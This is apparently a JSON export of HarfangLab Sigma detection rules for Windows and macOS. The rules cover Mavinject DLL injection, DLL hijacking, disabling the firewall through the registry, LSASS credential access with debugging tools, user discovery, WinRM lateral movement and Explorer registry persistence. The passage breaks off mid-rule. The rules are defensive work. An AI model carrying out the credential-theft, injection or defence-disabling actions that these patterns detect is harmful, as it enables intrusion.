"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.070652Z", + "creation_date": "2026-03-23T11:45:34.070654Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.070658Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/", + "https://attack.mitre.org/techniques/T1218/013/", + "https://attack.mitre.org/techniques/T1055/001/" + ], + "name": "t1218_013_mavinject.yml", + "content": "title: Proxy Execution via Mavinject\nid: 31ccdc74-069f-43fc-87d2-615dcae0c977\ndescription: |\n Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\n Attackers may abused it to bypass security restrictions.\n It is recommended to ensure that the injected DLL is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/013/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2022/02/28\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.013\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mavinject\n - 
classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n CommandLine|contains: ' /INJECTRUNNING *.dll'\n\n exclusion_appvclient:\n CommandLine:\n - '?:\\WINDOWS\\system32\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems64.dll 1'\n - '?:\\Windows\\SysWOW64\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems32.dll 1'\n ParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "31ccdc74-069f-43fc-87d2-615dcae0c977", + "rule_name": "Proxy Execution via Mavinject", + "rule_description": "Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to ensure that the injected DLL is legitimate.\n", + "rule_creation_date": "2022-02-28", + "rule_modified_date": "2025-06-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1055.001", + "attack.t1218.013" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.586826Z", + "creation_date": "2026-03-23T11:45:34.586829Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.586837Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_netplwiz.yml", + "content": "title: DLL Hijacking via netplwiz.exe\nid: 31dac5b8-d9c0-4cae-865a-9d528c8e6c00\ndescription: |\n Detects potential Windows DLL Hijacking via netplwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - 
attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netplwiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\NETPLWIZ.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00", + "rule_name": "DLL Hijacking via netplwiz.exe", + "rule_description": "Detects potential Windows DLL Hijacking via netplwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + 
"rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086751Z", + "creation_date": "2026-03-23T11:45:34.086753Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086758Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + "https://attack.mitre.org/techniques/T1562/004/", + "https://attack.mitre.org/software/S0075/" + ], + "name": "t1562_004_registry_disable_firewall_public_profile.yml", + "content": "title: Windows Firewall Disabled for Public Profile via Registry\nid: 31dd17cd-3ed5-4e4d-949f-71cfddc70c1e\ndescription: |\n Detects when the firewall is disabled for the public profile.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the process performing this action to 
determine its legitimacy as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0075/\ndate: 2021/10/14\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0075\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall'\n Details: 'DWORD (0x00000000)'\n\n # Avoid detection when Windows firewall is disabled in graphic mode\n # We have specific rules to detect deactivation via netsh or powershell\n # This rule can match a deactivation via reg.exe for example (used by some malwares or test frameworks)\n filter_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetwork'\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetworkfirewall -p'\n - '?:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e", + "rule_name": "Windows Firewall Disabled for Public Profile via Registry", + "rule_description": "Detects when the firewall is disabled for the public profile.\nAdversaries may disable or modify system firewalls in order to bypass controls 
limiting network usage.\nIt is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\n", + "rule_creation_date": "2021-10-14", + "rule_modified_date": "2025-02-19", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1562.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075072Z", + "creation_date": "2026-03-23T11:45:34.075074Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075079Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "name": "t1003_001_lsass_debugger_tracing_read_access.yml", + "content": "title: LSASS Accessed via Debugger Tool\nid: 31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778\ndescription: |\n Detects the use of legitimate 
debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\n Time Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\n This can be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/04\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Tttracer\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n\n selection_ttdinject_calltrace:\n CallTrace|contains: 'ttdinject.exe'\n\n selection_ttdinject_original_name:\n ProcessOriginalFileName: 'TTDInject.EXE'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778", + "rule_name": "LSASS Accessed via Debugger Tool", + "rule_description": "Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\nTime Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\nThis can be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to investigate the 
source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\n", + "rule_creation_date": "2021-06-04", + "rule_modified_date": "2025-02-12", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001", + "attack.t1078" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3201beb0-92c6-4539-9056-3a82a91c968b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598735Z", + "creation_date": "2026-03-23T11:45:34.598739Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598746Z", + "rule_level": "low", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1087/002/" + ], + "name": "t1087_002_dscacheutil_discovery_user_macos.yml", + "content": "title: Users Listed via dscacheutil\nid: 3201beb0-92c6-4539-9056-3a82a91c968b\ndescription: |\n Detects the execution of the dscacheutil command to query information about users.\n Adversaries can use this 
information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil.\nreferences:\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q user'\n\n exclusion_legitimate_parent:\n ParentImage:\n - '/Library/Application Support/AirWatch/hubd'\n - '/usr/local/libexec/ec2-macos-init'\n - '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3201beb0-92c6-4539-9056-3a82a91c968b", + "rule_name": "Users Listed via dscacheutil", + "rule_description": "Detects the execution of the dscacheutil command to query information about users.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil.\n", + "rule_creation_date": "2024-06-13", + "rule_modified_date": "2025-05-15", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1087.001", + "attack.t1087.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "3205ac34-383e-49e2-b12e-a0917cf9ef07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.073489Z", + "creation_date": "2026-03-23T11:45:34.073491Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.073495Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://attack.mitre.org/techniques/T1505/003/" + ], + "name": "t1620_suspicious_dotnet_exchange.yml", + "content": "title: Suspicious Dotnet Assembly Loaded by Exchange Server\nid: 3205ac34-383e-49e2-b12e-a0917cf9ef07\ndescription: |\n Detects the loading suspicious a Dotnet library by Exchange Server.\n Attackers may dynamically load assemblies in Exchange to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: 
library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "3205ac34-383e-49e2-b12e-a0917cf9ef07", + "rule_name": "Suspicious Dotnet Assembly Loaded by Exchange Server", + "rule_description": "Detects the loading suspicious a Dotnet library by Exchange Server.\nAttackers may dynamically load assemblies in Exchange to stealthily execute further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n", + "rule_creation_date": "2025-07-25", + "rule_modified_date": "2025-10-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1620" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "32191273-d165-4ec0-87ae-c0ebbdbda1af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.620831Z", + "creation_date": "2026-03-23T11:45:34.620832Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.620837Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2", + "https://attack.mitre.org/techniques/T1021/006/" + ], + "name": "t1021_006_winrm_service_auto.yml", + "content": "title: WinRM Service auto-start Enabled\nid: 32191273-d165-4ec0-87ae-c0ebbdbda1af\ndescription: |\n Detects when the Windows Remote Management (WinRM) service is set to auto-start.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organization.\n It is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - 
https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinRM\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_exchange:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "32191273-d165-4ec0-87ae-c0ebbdbda1af", + "rule_name": "WinRM Service auto-start Enabled", 
+ "rule_description": "Detects when the Windows Remote Management (WinRM) service is set to auto-start.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organization.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\n", + "rule_creation_date": "2022-11-04", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "323dc7e5-08a1-429c-83b5-3df588b5a245", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.082314Z", + "creation_date": "2026-03-23T11:45:34.082316Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.082320Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://persistence-info.github.io/Data/explorertools.html", + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://attack.mitre.org/techniques/T1546/" + ], + "name": "t1546_persistence_explorer_tools.yml", + "content": "title: Possible Explorer Tools Persistence Added\nid: 323dc7e5-08a1-429c-83b5-3df588b5a245\ndescription: |\n Detects the edition of the Explorer Tools registry keys that lists tools sometimes called by Windows.\n This method is used as a means to achieve persistence by replacing one of the registry keys by a malicious payload.\n It is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\nreferences:\n - https://persistence-info.github.io/Data/explorertools.html\n - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\BackupPath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\cleanuppath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\defragpath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableStorage\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_tools:\n Details|contains:\n - 
